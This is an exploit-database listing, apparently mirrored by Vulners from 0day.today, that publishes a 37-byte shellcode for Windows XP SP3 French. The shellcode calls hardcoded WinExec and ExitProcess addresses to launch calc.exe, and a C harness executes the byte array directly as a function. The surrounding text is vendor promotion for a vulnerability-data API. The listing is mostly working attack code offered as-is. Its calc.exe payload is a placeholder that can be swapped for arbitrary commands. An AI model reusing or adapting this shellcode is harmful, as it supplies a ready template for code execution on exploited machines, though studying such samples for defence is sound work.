Lucene search
K

win32/xp sp3 (Fr) calc.exe shellcode 37 bytes

🗓️ 27 Apr 2010 00:00:00Reported by antrhacksType 
zdt
 zdt
🔗 0day.today👁 30 Views

Win XP SP3 French calc.exe shellcode 37 byte

Code
=============================================
win32/xp sp3 (Fr) calc.exe shellcode 37 bytes
=============================================


/*
 * Title: Windows XP SP3 Fr (calc.exe) shellcode 37 bytes
 * Type: Shellcode
 * Author: antrhacks
 * Platform: win32
 * Tested on: Windows XP SP3 Home edition Fr
*/


#include <stdio.h>
#include <stdlib.h>

int main(){
char shellcode[] = "\xeb\x16\x5b\x50\x88\x43\x09\x53"
                   "\xbb\x0d\x25\x86\x7c"
                   "\xff\xd3\x31\xc0"
                   "\xbb\x12\xcb\x81\x7c"
                   "\xff\xd3\xe8\xe5\xff\xff\xff"
                   "\x63\x61\x6c\x63\x2e"
                   "\x65\x78\x65";
                   
 printf("Taille: %d \n", strlen(shellcode));
 getchar();
 (*(void (*)()) shellcode)();
 return 0;
}



#  0day.today [2018-02-07]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2010 00:00Current
7High risk
Vulners AI Score7
30